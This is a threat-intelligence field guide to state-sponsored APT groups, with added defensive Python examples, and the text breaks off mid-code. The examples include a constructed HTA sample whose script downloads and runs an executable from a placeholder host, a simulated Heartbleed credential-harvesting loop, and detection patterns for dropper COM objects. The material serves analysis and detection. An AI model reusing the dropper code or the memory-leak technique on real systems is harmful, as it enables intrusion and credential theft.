Advanced Persistent Threat Groups

A field guide to state-sponsored cyber attackers, who they target and how they operate

FireEye tracks cyber attackers all over the world, but we pay special attention to attackers who carry out advanced persistent threat (APT) attacks.

APT attackers receive direction and support from an established nation state. Whether their mission is to steal data, disrupt operations or destroy infrastructure, these threat actors tenaciously pursue their goal using a wide range of tools and tactics.

Unlike most cyber criminals, APT attackers pursue their objectives over an extended period of time, typically months or years. They adapt to organizations’ efforts to eradicate them, frequently changing their attack vectors or malware payloads. And they frequently return to the same victim multiple times after being ejected from a network.

The presence of an APT-linked malware variant in your system does not always mean that you are in the crosshairs of an APT attacker. Other cyber criminals use APT-linked malware as well.

Identifying who introduced malware into your system usually requires more contextual intelligence. Still, your security team should pay close attention when their security tools detect malware linked to previous APT attacks.

This page highlights eleven of the most active APT groups, all of which are still active across the cyber threat landscape.

Related blog post: APT33: New Cyber Espionage Group

APT Groups

APT33 | APT32 | APT30 | APT29 | APT28 | APT18 | APT17 | APT12 | APT5 | APT3 | APT1

APT33

First known appearance: 2013

Threat Actors: Iranian government, with possible ties to the Islamic Revolutionary Guard Corps (IRGC)

Targets: Aerospace and Energy sectors

Objective: APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored.

Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

Associated malware: SHAPESHIFT, DROPSHOT, TURNEDUP, NANOCORE, NETWIRE, ALFA Shell 

Typical attack vectors: APT33 sent spear-phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment-themed lures and contained links to malicious HTML Application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals. (An example .hta file excerpt is provided in Figure 2.) To the user, the file would appear to be a benign set of references to legitimate job postings. Unbeknownst to the user, however, the .hta file also contained embedded JavaScript that automatically downloaded a custom APT33 backdoor. An HTA is executed by mshta.exe with the privileges of the logged-on user rather than inside the browser sandbox, which is what makes the file type attractive as a dropper.
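The practical triage question for a lure like this is not what the page shows but what its script does. The following is an added example, not code from the page or from FireEye: it parses an .hta, looks only at the script blocks, and flags the COM object chain that turns a "job posting" into a dropper (XMLHTTP download, ADODB.Stream write, WScript.Shell execution) together with the hidden-window attributes. The sample HTA is constructed for illustration; the URLs and file names in it are placeholders, and the indicator list is an assumption about common dropper patterns, not a description of APT33's file.

```python
import re

# Constructed sample (not APT33's file): the visible body is a job posting, but a
# script block downloads a binary with XMLHTTP, writes it with ADODB.Stream and
# runs it through WScript.Shell, while the HTA window itself is kept minimized.
SAMPLE_HTA = """<html><head><title>Senior Avionics Engineer - Opening</title>
<HTA:APPLICATION ID="app" WINDOWSTATE="minimize" SHOWINTASKBAR="no">
<script language="JavaScript">
var sh = new ActiveXObject("WScript.Shell");
var req = new ActiveXObject("MSXML2.XMLHTTP");
req.open("GET", "http://example.invalid/update.exe", false); req.send();
var st = new ActiveXObject("ADODB.Stream");
st.Open(); st.Type = 1; st.Write(req.responseBody); st.SaveToFile("update.exe", 2);
sh.Run("update.exe");
</script></head>
<body><h1>Senior Avionics Engineer</h1>
<p>Full posting: <a href="https://jobs.example.invalid/123">careers site</a></p>
</body></html>"""

# Constructed control: the same lure text with no script at all.
BENIGN_HTA = """<html><head><title>Senior Avionics Engineer</title></head>
<body><p>Full posting: <a href="https://jobs.example.invalid/123">careers site</a></p></body></html>"""

SCRIPT_RX = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
URL_RX = re.compile(r"""https?://[^\s"'<>]+""", re.I)
HIDDEN_WINDOW_RX = re.compile(
    r'<HTA:APPLICATION[^>]*(?:WINDOWSTATE\s*=\s*"?minimize|SHOWINTASKBAR\s*=\s*"?no)', re.I)

# COM objects that together give download -> write to disk -> execute (assumed indicator set).
SCRIPT_INDICATORS = {
    "http_download": re.compile(r"""ActiveXObject\(\s*["'](?:MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP)""", re.I),
    "file_write":    re.compile(r"""ActiveXObject\(\s*["']ADODB\.Stream""", re.I),
    "shell_exec":    re.compile(r"""ActiveXObject\(\s*["'](?:WScript\.Shell|Shell\.Application)""", re.I),
}


def triage_hta(content):
    """Classify an .hta by what its script blocks do; the visible HTML is ignored on purpose."""
    scripts = SCRIPT_RX.findall(content)
    script_text = "\n".join(scripts)
    hits = {name: bool(rx.search(script_text)) for name, rx in SCRIPT_INDICATORS.items()}
    hits["hidden_window"] = bool(HIDDEN_WINDOW_RX.search(content))
    # URLs are collected from script only, so the lure's legitimate job links do not pollute the result.
    urls = URL_RX.findall(script_text)
    if hits["http_download"] and hits["file_write"] and hits["shell_exec"]:
        verdict = "dropper-chain"
    elif scripts:
        verdict = "review"
    else:
        verdict = "no-script"
    return {"verdict": verdict, "hits": hits, "script_urls": urls}


if __name__ == "__main__":
    for label, hta in (("lure", SAMPLE_HTA), ("benign", BENIGN_HTA)):
        print(label, triage_hta(hta))
```

The point of collecting URLs from script blocks only is that the lure's body deliberately contains legitimate job links; a scanner that extracts every URL on the page produces noise that hides the one download that matters.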

APT32

Also known as: OceanLotus Group

First known appearance: 2014

Threat Actors: Vietnamese government (suspected)

Targets: Foreign companies investing in Vietnam’s manufacturing, consumer products, consulting and hospitality sectors.

Objective: To gain advantage over global companies doing business in Vietnam.

Overview: Recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business, manufacturing or preparing to invest in the country. While the specific motivation for this activity remains opaque, it could ultimately erode the competitive advantage of targeted organizations.

In addition to targeting of the private sector, this activity represents a threat to civil society and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora could all be targeted. Although targeting of the military and defense industrial base has not yet been identified, the extension of APT32 capabilities in that direction should be anticipated.

Associated malware: SOUNDBITE, WINDSHIELD, PHOREAL, BEACON, KOMPROGO

Typical attack vectors: APT32 actors leverage ActiveMime files that employ social engineering to entice the victim into enabling macros. Upon execution, the initialized file typically downloads multiple malicious payloads from a remote server. APT32 actors deliver the malicious attachments via spear-phishing emails; evidence shows that some may have been sent via Gmail.

APT32 actors design multilingual lure files that contain malicious macros and are tailored to specific victims. These files are created by exporting Word documents as single-file web pages. Although the files have “.doc” extensions, they are ActiveMime “.mht” web page archives that contain text, images and macros. Word identifies the format from the content rather than the extension, so the file opens and prompts for macro execution even though it is neither an OLE2 nor an OOXML document, which is exactly what defeats attachment filters that trust the extension.
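The mismatch between extension and container is easy to check mechanically. The following is an added example, not code from the page or from FireEye: it classifies a "Word document" by its real container (OLE2, OOXML zip, or MIME archive), and for MIME archives walks the parts with the standard library's email parser to find an application/x-mso part whose decoded payload starts with the ActiveMime magic, which is the part Word uses to carry the embedded VBA project. The sample .mht and the editdata.mso stand-in are constructed; the real part contains a compressed OLE stream, which this example does not unpack.

```python
import base64
import email
import re

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # classic .doc/.xls compound file
OOXML_MAGIC = b"PK\x03\x04"                         # .docx/.docm zip container
MIME_HEADER_RX = re.compile(rb"\s*(?:MIME-Version|Content-Type|From)\s*:", re.I)

# Constructed stand-in for Word's editdata.mso part: the real one is an "ActiveMime"
# header followed by a compressed OLE stream holding the VBA project.
FAKE_MSO = b"ActiveMime\x00\x00\x01\x0f" + b"\x00" * 6 + b"constructed stand-in for the VBA project"

# Constructed single-file web page as Word would export it, renamed to .doc by the sender.
SAMPLE_MHT = (
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/related; boundary="----=_NextPart_01D2.ABC"\r\n'
    b"\r\n"
    b"------=_NextPart_01D2.ABC\r\n"
    b"Content-Location: file:///C:/lure/Investment_Brief.htm\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b'Content-Type: text/html; charset="us-ascii"\r\n'
    b"\r\n"
    b"<html><body><p>Enable content to view the investment brief.</p></body></html>\r\n"
    b"\r\n"
    b"------=_NextPart_01D2.ABC\r\n"
    b"Content-Location: file:///C:/lure/Investment_Brief_files/editdata.mso\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"Content-Type: application/x-mso\r\n"
    b"\r\n"
    + base64.b64encode(FAKE_MSO) + b"\r\n"
    b"\r\n"
    b"------=_NextPart_01D2.ABC--\r\n"
)


def classify_doc(filename, data):
    """Decide what container a 'Word document' really is and whether it carries an ActiveMime part."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    if data.startswith(OLE2_MAGIC):
        container = "ole2"
    elif data.startswith(OOXML_MAGIC):
        container = "ooxml-zip"
    elif MIME_HEADER_RX.match(data):
        container = "mime"
    else:
        container = "unknown"

    findings, mso_parts = [], []
    if container == "mime":
        msg = email.message_from_bytes(data)
        for part in msg.walk():
            if part.get_content_type() == "application/x-mso":
                blob = part.get_payload(decode=True) or b""      # undoes the base64 transfer encoding
                mso_parts.append((part.get("Content-Location", ""), blob.startswith(b"ActiveMime")))
        if ext in ("doc", "dot", "docx", "docm", "rtf"):
            findings.append("extension .%s but content is a MIME (.mht) archive" % ext)
        if any(is_active for _, is_active in mso_parts):
            findings.append("ActiveMime part present: embedded macro container")
    return {"container": container, "mso_parts": mso_parts, "findings": findings,
            "suspicious": bool(findings)}


if __name__ == "__main__":
    print(classify_doc("Investment_Brief.doc", SAMPLE_MHT))
    print(classify_doc("legit.doc", OLE2_MAGIC + b"\x00" * 504))
```

A gateway rule built on this check should treat the extension/container mismatch alone as enough to quarantine; the ActiveMime part confirms macros are present, but an .mht posing as .doc has no legitimate reason to arrive by email.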

APT30

First known appearance: 2004

Threat Actors: Communist Party of China, Chinese People’s Liberation Army

Targets: Members of the Association of Southeast Asian Nations (ASEAN)

Objective: To steal sensitive political, economic and military information about the region for government espionage.

Overview: APT30 is noted not only for sustained activity over a long period of time but also for successfully modifying and adapting source code to maintain the same tools, tactics and infrastructure since at least 2005. Evidence shows that the group prioritizes targets, most likely works in shifts in a collaborative environment and builds malware from a coherent development plan. The group has had the capability to infect air-gapped networks since 2005. Altogether, these signs indicate that APT30 is most likely a state-sponsored threat group funded and supported by the Chinese government.

Associated malware: Backspace, Neteagle, Shipshape, Spaceship, Flashflood and many others, including droppers, downloaders and backdoors

Typical attack vectors: APT30 uses a suite of tools that includes downloaders, backdoors, a central controller and several components designed to infect removable drives and cross air-gapped networks to steal data. APT30 frequently registers its own DNS domains for malware CnC activities.

Its malware uses version control and a consistent methodology (a set of mutexes and events) to manage malware execution and ensure that only a single copy of a given piece of malware is running at any given time, most likely to decrease the chances of detection. APT30 backdoors commonly use a two-stage CnC process whereby victim hosts contact an initial CnC server to determine whether they should connect to the attackers’ main controller. The controller uses a GUI that allows operators to prioritize hosts, add notes to victims and set alerts for when certain hosts come online. Finally, an unused dialog box in the controller provides a login prompt for the current “attendant.”

APT29

First known appearance: 2014

Threat Actors: Russian government (suspected)

Targets: Western European governments, foreign policy groups and other organizations with valuable information for Russia (reported)

Objective: Not disclosed.

Overview: APT29 is an adaptive and disciplined threat group that hides its activity on a victim’s network, communicating infrequently and in a way that closely resembles legitimate traffic. By using legitimate popular web services, the group can also take advantage of encrypted SSL connections, making detection even more difficult. APT29 is one of the most evolved and capable threat groups. It deploys new backdoors to fix its own bugs and add features. It monitors network defender activity to maintain control over systems. APT29 uses only compromised servers for CnC communication. It counters attempts to remediate attacks. It also maintains a fast development cycle for its malware, quickly altering tools to hinder detection.

Associated malware: Hammertoss, Uploader, tDiscoverer

Typical attack vectors: APT29 uses social media sites such as Twitter or GitHub, as well as cloud storage services, to relay commands and extract data from compromised networks. The group relays commands via images containing hidden and encrypted data. Information is extracted from a compromised network and files are uploaded to cloud storage services.
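Because the command channel is an ordinary image fetched from an ordinary web service, the detection opportunity is in the file itself rather than in the connection. The following is an added example, not code from the page or from FireEye: it locates the true end of a PNG (after the IEND chunk) or JPEG (after the EOI marker, walking segments so an EXIF thumbnail's own end marker is not mistaken for it) and reports any bytes appended after that point, scoring them by entropy since encrypted instructions look random. The page only says the images carry "hidden and encrypted data"; that the data is appended after the image, rather than woven into pixels, is an assumption of this example, and the PNG, JPEG skeleton and payload are all constructed.

```python
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_image_end(data):
    """Offset just past the IEND chunk, or None if the PNG chunk chain does not parse."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4                  # header + data + CRC
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None


def jpeg_image_end(data):
    """Offset just past the EOI marker. Segments are skipped by their length field, so an
    APP1/EXIF thumbnail (which contains its own FFD9) cannot be mistaken for the end."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        pos += 2
        if marker == 0xFF:                     # fill byte before a marker
            pos -= 1
            continue
        if marker == 0xD9:                     # EOI
            return pos
        if marker == 0xD8 or marker == 0x01 or 0xD0 <= marker <= 0xD7:
            continue                           # standalone markers carry no length
        if pos + 2 > len(data):
            return None
        pos += struct.unpack(">H", data[pos:pos + 2])[0]
        if marker == 0xDA:                     # SOS: skip entropy-coded data to the next real marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return None


def shannon_entropy(blob):
    if not blob:
        return 0.0
    counts = Counter(blob)
    return -sum(c / len(blob) * math.log2(c / len(blob)) for c in counts.values())


def find_trailer(data):
    """Return (format, bytes after the image end); (None, b'') if neither parser accepts the file."""
    for fmt, finder in (("png", png_image_end), ("jpeg", jpeg_image_end)):
        end = finder(data)
        if end is not None:
            return fmt, data[end:]
    return None, b""


def is_suspicious(data, min_len=16, min_entropy=7.0):
    fmt, trailer = find_trailer(data)
    return fmt is not None and len(trailer) >= min_len and shannon_entropy(trailer) >= min_entropy


def make_png():
    """Valid 1x1 red PNG built from scratch (constructed test input)."""
    def chunk(ctype, body):
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)      # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")                # filter byte + one pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


# Structurally valid JPEG skeleton (constructed): SOI, APP0, SOS with a stuffed FF00 inside the scan, EOI.
MINI_JPEG = (b"\xff\xd8"
             + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
             + b"\x12\x34\xff\x00\x56"
             + b"\xff\xd9")

# Stand-in for an encrypted command blob: every byte value equally often, so entropy is 8 bits/byte.
FAKE_ENCRYPTED_COMMAND = bytes(range(256))

if __name__ == "__main__":
    for label, blob in (("clean png", make_png()), ("png+trailer", make_png() + FAKE_ENCRYPTED_COMMAND),
                        ("jpeg+trailer", MINI_JPEG + FAKE_ENCRYPTED_COMMAND)):
        fmt, trailer = find_trailer(blob)
        print(label, fmt, len(trailer), round(shannon_entropy(trailer), 2), is_suspicious(blob))
```

Run this over images pulled from proxy logs for the services the page names (social media, code hosting, cloud storage) and the trailer length plus entropy gives a cheap first filter; a trailer of a few hundred random-looking bytes behind a tiny avatar image deserves a closer look, whereas a short ASCII trailer is usually just a sloppy upload.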

APT28

Also known as: Sofacy Group

First known appearance: 2007

Threat Actors: Russian government

Targets: The Caucasus, particularly Georgia, eastern European countries and militaries, North Atlantic Treaty Organization (NATO) and other European security organizations and defense firms

Objective: To gain insider information related to governments, militaries and security organizations.

Overview: APT28 is a skilled team of developers and operators collecting intelligence on defense and geopolitical issues—intelligence that would be useful only to a government. This APT group compiles malware samples with Russian language settings during working hours (8 a.m. to 6 p.m.), consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. This suggests that APT28 receives direct ongoing financial and other resources from a well-established organization, most likely the Russian government.

Associated malware: Chopstick, Sourface

Typical attack vectors: Tools commonly used by APT28 include the Sourface downloader, its second-stage backdoor Eviltoss and a modular family of implants dubbed Chopstick. APT28 has employed RSA encryption to protect files and stolen information moved from the victim’s network to the controller. It has also made incremental and systematic changes to the Sourface downloader and its surrounding ecosystem since 2007, indicating a long-standing and dedicated development effort.
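The working-hours argument in the overview above is a measurement, and it is worth seeing how it is made. The following is an added example, not code from the page or from FireEye: it reads the COFF TimeDateStamp out of a PE header, converts it into a candidate time zone supplied by the analyst, and counts how many samples fall in weekday office hours. The sample corpus is constructed from header-only stubs; the UTC offset is an input (Moscow was UTC+4 between 2011 and October 2014, UTC+3 since), and the example does not cover the resource-language check the overview also mentions.

```python
import struct
from datetime import datetime, timedelta, timezone


def pe_timestamp(data):
    """COFF TimeDateStamp of a PE file as a UTC datetime; None if the header is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    # COFF header: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    ts = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def make_pe_stub(compiled_at):
    """Constructed DOS+PE header carrying the given compile time (a header only, not a runnable binary)."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, int(compiled_at.timestamp()), 0, 0, 0xE0, 0x102)
    return dos + b"PE\x00\x00" + coff


def working_hours_profile(samples, utc_offset_hours, start_hour=8, end_hour=18):
    """Bucket compile times by local hour in the candidate time zone; count weekday office-hours hits."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    histogram = [0] * 24
    in_office_hours = 0
    for blob in samples:
        when = pe_timestamp(blob)
        if when is None:
            continue
        local = when.astimezone(tz)
        histogram[local.hour] += 1
        if local.weekday() < 5 and start_hour <= local.hour < end_hour:
            in_office_hours += 1
    return histogram, in_office_hours


# Constructed corpus. Moscow ran on UTC+4 in 2014, so the analyst-supplied offset for it is 4.
MSK_2014 = timezone(timedelta(hours=4))
SAMPLES = [make_pe_stub(datetime(2014, 3, 4, 9, 15, tzinfo=MSK_2014)),   # Tue
           make_pe_stub(datetime(2014, 3, 4, 14, 40, tzinfo=MSK_2014)),
           make_pe_stub(datetime(2014, 3, 5, 17, 59, tzinfo=MSK_2014)),  # Wed
           make_pe_stub(datetime(2014, 3, 7, 11, 5, tzinfo=MSK_2014)),   # Fri
           make_pe_stub(datetime(2014, 3, 8, 12, 0, tzinfo=MSK_2014)),   # Sat: outside office hours
           make_pe_stub(datetime(2014, 3, 5, 2, 30, tzinfo=MSK_2014))]   # night: outside office hours

if __name__ == "__main__":
    for offset in (4, 8, -5):   # Moscow 2014, Beijing, US Eastern standard time
        hist, hits = working_hours_profile(SAMPLES, offset)
        print("UTC%+d: %d/%d samples in weekday office hours" % (offset, hits, len(SAMPLES)))
```

The caveat that comes with this measurement: the timestamp is attacker-controlled and some toolchains zero it or set it deliberately, so it only supports attribution when hundreds of samples line up and when it agrees with independent signals such as the language resources the overview mentions.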

APT18

Also known as: Dynamite Panda, Wekby, TG-0416

First known appearance: 2010

Threat Actors: People’s Republic of China (suspected)

Targets: Aerospace, defense and engineering sectors along with, more recently, healthcare, pharmaceutical and medical device companies

Objective: To steal IP related to technologies, processes and expertise

Overview: APT18 was responsible for a major data breach at Community Health Systems (CHS). Very little information about APT18 has been released into the public domain.

Associated malware: Gh0st remote access Trojan (RAT)

Typical attack vectors: APT18 attackers exploited the “Heartbleed” bug (CVE-2014-0160) in a virtual private network (VPN) server within the CHS network. Each malformed TLS heartbeat request leaks up to 64 KB of the server’s process memory, so the attackers threw thousands of such messages at the server, harvesting memory fragments until they had recovered enough (such as user credentials) to gain access.
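What makes "thousands of messages" worthwhile is a single missing bounds check. The following is an added illustration in Python, not code from the page and not OpenSSL's code: a model of the vulnerable heartbeat handler beside the patched one, fed a request that claims a 16 KiB payload while sending one byte, plus a harvesting loop that runs the request against several constructed memory snapshots the way an attacker runs it against a live server over time. The snapshot contents (a session cookie, a login form body) are made up for the example.

```python
import re
import struct

TLS1_HB_REQUEST, TLS1_HB_RESPONSE = 1, 2
PADDING = 16   # RFC 6520 minimum padding


def vulnerable_heartbeat(record, adjacent_memory):
    """OpenSSL 1.0.1 to 1.0.1f behaviour: the reply copies payload_length bytes starting at the
    payload, trusting the peer's length field, so the copy runs past the record into whatever
    the process had next to it (modelled here as adjacent_memory)."""
    hb_type, payload_len = struct.unpack(">BH", record[:3])
    if hb_type != TLS1_HB_REQUEST:
        return None
    process_memory = record + adjacent_memory
    return bytes([TLS1_HB_RESPONSE]) + struct.pack(">H", payload_len) + process_memory[3:3 + payload_len]


def fixed_heartbeat(record, adjacent_memory):
    """1.0.1g adds the bounds check: type + length + payload + padding must fit in the record."""
    if 1 + 2 + PADDING > len(record):
        return None
    hb_type, payload_len = struct.unpack(">BH", record[:3])
    if hb_type != TLS1_HB_REQUEST or 1 + 2 + payload_len + PADDING > len(record):
        return None                                   # silently discard, as the patch does
    return bytes([TLS1_HB_RESPONSE]) + struct.pack(">H", payload_len) + record[3:3 + payload_len]


def heartbeat_record(payload, claimed_len=None):
    claimed = len(payload) if claimed_len is None else claimed_len
    return bytes([TLS1_HB_REQUEST]) + struct.pack(">H", claimed) + payload + b"\x00" * PADDING


HONEST = heartbeat_record(b"ping")
MALICIOUS = heartbeat_record(b"A", claimed_len=0x4000)   # claims 16 KiB, sends one byte

# Constructed memory snapshots standing in for what an SSL VPN's heap held at different moments.
SNAPSHOTS = [
    b"\x00" * 40 + b"GET /portal/ HTTP/1.1\r\nCookie: session=9c41d2e7b0\r\n" + b"\x00" * 30,
    b"\x17\x03\x01" + b"\x00" * 20 + b"username=jdoe&password=Winter2014!&realm=Users" + b"\x00" * 10,
    b"\x00" * 80,
]

CREDENTIAL_RX = re.compile(rb"(?:password|session)=[^&\s]+")


def harvest(snapshots, record=MALICIOUS):
    """Fire the oversized request once per snapshot and keep whatever looks like a credential."""
    found = set()
    for mem in snapshots:
        reply = vulnerable_heartbeat(record, mem)
        found.update(CREDENTIAL_RX.findall(reply))
    return found


if __name__ == "__main__":
    print("honest, fixed   :", fixed_heartbeat(HONEST, b"")[3:])
    print("malicious, fixed:", fixed_heartbeat(MALICIOUS, SNAPSHOTS[1]))
    print("malicious, vuln :", vulnerable_heartbeat(MALICIOUS, SNAPSHOTS[1])[3:80])
    print("harvested       :", harvest(SNAPSHOTS))
```

Two things the model makes visible that the prose does not: the leak is silent on the server side because the reply is a perfectly valid heartbeat, and the attacker never chooses what comes back, which is why repetition rather than precision is the technique.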

APT17

Also known as: DeputyDog

First known appearance: 2013

Threat Actors: Communist Party of China, Chinese People’s Liberation Army

Targets: U.S. government entities, the defense industry, law firms, information technology companies, mining companies and non-governmental organizations

Objective: To steal military intelligence.

Overview: Confident in its resources and skills, APT17 demonstrates the increasing use of public websites to hide attacks in plain sight. It loads malicious software directly into a computer's memory in a way that bypasses the hard drive, making it more difficult for companies to use traditional forensic and scanning techniques to identify compromised computers.

APT17 uses Blackcoffee malware as part of the first stage of its attacks. Blackcoffee functionality includes uploading and downloading files; creating a reverse shell; enumerating files and processes; renaming, moving and deleting files; terminating processes; and expanding its functionality by adding new backdoor commands.

Associated malware: Blackcoffee

Typical attack vectors: APT17 embedded the encoded CnC IP address for the Blackcoffee malware in legitimate Microsoft TechNet profile pages and forum threads. Encoding the IP address made it more difficult to identify the true CnC address. APT17 used Blackcoffee variants to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines.

APT12

Also known as: Ixeshe, DynCalc, DNSCalc, “Darwin’s favorite APT group”

First known appearance: 2012

Threat Actors: People’s Republic of China, Chinese People’s Liberation Army

Targets: Western journalists, U.S. military contractors, Taiwanese and Japanese governments and Japanese technology companies, especially satellite and crypto technology firms

Objective: To maintain surveillance on media outlets that could impact the reputation of Chinese leaders and to collect intelligence on military technology companies in the United States, Japan and Taiwan.

Overview: More clandestine, discriminating and skilled than many other groups operating out of China, APT12 primarily targets journalists and military contractors from the United States and Pacific Rim. APT12 specializes in gathering highly specific information of interest to the Chinese government and military. APT12 follows news about itself and modifies its tools and techniques accordingly.

Associated malware: Riptide, Hightide, Threebyte, Waterspout

Typical attack vectors: APT12 typically uses spear phishing as its primary delivery method, sending emails that contain malicious links or attachments to employees of the targeted organization. If someone takes the bait, APT12 then installs multiple backdoors such as RIPTIDE.

RIPTIDE is a proxy-aware backdoor that communicates via HTTP to a hard-coded command-and-control (CnC) server. RIPTIDE’s first communication with its CnC server fetches an RC4 encryption key, which is used to encrypt all further communication. APT12 typically then installs custom software and remote access tools to search for and siphon targeted data.
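Fetching the RC4 key over the same plaintext HTTP channel it is meant to protect means anyone holding a packet capture of the session can read the rest of it. The following is an added example, not code from the page or from FireEye: a plain RC4 implementation and a routine that takes the key from the first server response in a captured exchange and decrypts every later message. The capture is constructed, and the assumption that the first response body is the raw key is an illustration, not RIPTIDE's actual wire format.

```python
def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Constructed capture of one implant session. The key-fetch format (the first response body
# is the raw key) is an assumption for illustration, not RIPTIDE's actual wire format.
SESSION_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
CAPTURED = [
    ("request",  b"GET /index.php?id=WS0042 HTTP/1.1\r\nHost: example.invalid\r\n\r\n"),
    ("response", SESSION_KEY),
    ("request",  rc4(SESSION_KEY, b"beacon host=WS0042 user=analyst os=Windows 7")),
    ("response", rc4(SESSION_KEY, b"cmd: dir C:\\Users\\analyst\\Documents")),
    ("request",  rc4(SESSION_KEY, b"result: Proposal_Q3.docx Budget.xlsx")),
]


def decrypt_session(messages):
    """Pull the key from the first response, then decrypt everything that follows it."""
    key = None
    plaintexts = []
    for direction, body in messages:
        if key is None:
            if direction == "response":
                key = body
            continue
        plaintexts.append((direction, rc4(key, body)))
    return plaintexts


if __name__ == "__main__":
    for direction, text in decrypt_session(CAPTURED):
        print(direction, text.decode())
```

Even without the key, reusing one RC4 key for every message means the XOR of two ciphertexts equals the XOR of their plaintexts, so a capture that missed the key fetch is still far from safe for the operator; a backdoor designed by someone who cared about confidentiality would derive a fresh keystream per message.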

APT5

First known appearance: 2005

Threat Actors: Undisclosed

Targets: Telecommunications and technology companies, particularly in Southeast Asia, as well as high-tech manufacturing firms and military application technology

Objective: To steal emails, procurement bids and proposals, documents on unmanned aerial vehicles (UAVs) and proprietary product specifications.

Overview: APT5 appears to be a large threat group that consists of several subgroups. It tends to focus on satellite and other telecommunications companies and on technology companies based primarily in Southeast Asia. It steals information such as pricing data, contract negotiations, inventories and product deployment data.

Associated malware: Leouncia

Typical attack vectors: APT5 often uses malware with keylogging capabilities to specifically target telecommunication companies' corporate networks, employees and executives.

APT3

Also known as: UPS

First known appearance: 2014

Threat Actors: Undisclosed (based in China)

Targets: Companies in the energy, aerospace and defense, construction and engineering, high-tech, telecommunications and transportation sectors

Objective: Undisclosed

Overview: APT3 leverages zero-day vulnerabilities in widespread but infrequent phishing campaigns. The recent use of known exploits, social engineering and more frequent attacks implies a possible shift in strategy and possibly a lack of access to further zero-day exploits. Regardless, APT3 has been identified as the main actor behind a major attack campaign called Operation Clandestine Fox.

Associated malware: Shotput, CookieCutter, PlugX/Sogu

Typical attack vectors: APT3 is primarily known for sending out spear-phishing messages that contain a compressed executable attachment. The attackers have also leveraged exploits for CVE-2014-6332 (Windows OLE Automation array remote code execution) and CVE-2014-4113 (win32k.sys privilege escalation).
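A compressed executable gets past filters that only look at the outer attachment's extension. The following is an added example, not code from the page or from FireEye: it opens a zip attachment in memory and flags members that are executable by content (PE, ELF or shebang magic) or by name, including the double-extension trick and executable content behind an innocuous name, while also reporting encrypted members it cannot inspect and refusing archives with too many or oversized entries. The sample archive and the executable stand-ins in it are constructed; the extension list is an assumption about what a mail gateway should treat as executable.

```python
import io
import zipfile

EXEC_MAGIC = ((b"MZ", "pe"), (b"\x7fELF", "elf"), (b"#!", "script"))
EXEC_EXTS = {"exe", "scr", "com", "pif", "dll", "hta", "js", "jse", "vbs", "vbe",
             "bat", "cmd", "ps1", "jar", "lnk"}


def inspect_archive(data, max_members=1000, max_member_bytes=50 * 1024 * 1024):
    """Flag members that are executable by content or by name, plus anything that blocks inspection."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        infos = z.infolist()
        if len(infos) > max_members:
            findings.append(("<archive>", ["too many members (%d)" % len(infos)]))
            return findings
        for info in infos:
            if info.is_dir():
                continue
            reasons = []
            name = info.filename.rsplit("/", 1)[-1].lower()
            exts = name.split(".")[1:]
            if exts and exts[-1] in EXEC_EXTS:
                reasons.append("executable extension ." + exts[-1])
            if len(exts) >= 2:
                reasons.append("double extension")
            if info.file_size > max_member_bytes:
                reasons.append("oversized member (%d bytes declared)" % info.file_size)   # zip-bomb guard
            else:
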